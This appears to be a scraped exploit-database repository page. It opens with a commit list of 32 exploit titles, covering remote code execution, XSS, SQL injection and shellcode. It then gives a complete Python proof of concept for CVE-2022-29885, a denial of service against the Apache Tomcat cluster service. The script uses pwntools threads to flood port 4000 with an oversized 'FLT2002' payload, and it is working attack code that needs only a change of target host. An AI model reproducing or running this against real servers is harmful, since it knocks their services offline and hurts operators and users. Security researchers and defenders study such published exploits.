d46ab98863
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
55 lines
No EOL
916 B
Python
Executable file
55 lines
No EOL
916 B
Python
Executable file
# Exploit Title: Apache Tomcat 10.1 - Denial Of Service
|
|
# Google Dork: N/A
|
|
# Date: 13/07/2022
|
|
# Exploit Author: Cristian 'void' Giustini
|
|
# Vendor Homepage: https://tomcat.apache.org/
|
|
# Software Link: https://tomcat.apache.org/download-10.cgi
|
|
# Version: <= 10.1
|
|
# Tested on: Apache Tomcat 10.0 (Docker)
|
|
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
|
|
# Exploit pre-requirements: pip install pwntools==4.8.0
|
|
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/
|
|
|
|
|
|
|
|
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
# coding: utf-8
|
|
|
|
from pwn import *
|
|
|
|
import time
|
|
|
|
import threading
|
|
|
|
import subprocess
|
|
|
|
threads = []
|
|
|
|
|
|
|
|
|
|
|
|
def send_payload():
|
|
|
|
r = remote("localhost", 4000)
|
|
|
|
while True:
|
|
|
|
r.send(b"FLT2002" + b"A" * 10000)
|
|
|
|
|
|
|
|
for _ in range(5):
|
|
|
|
new_thread = threading.Thread(target=send_payload)
|
|
|
|
threads.append(new_thread)
|
|
|
|
new_thread.start()
|
|
|
|
for old_thread in threads:
|
|
|
|
old_thread.join() |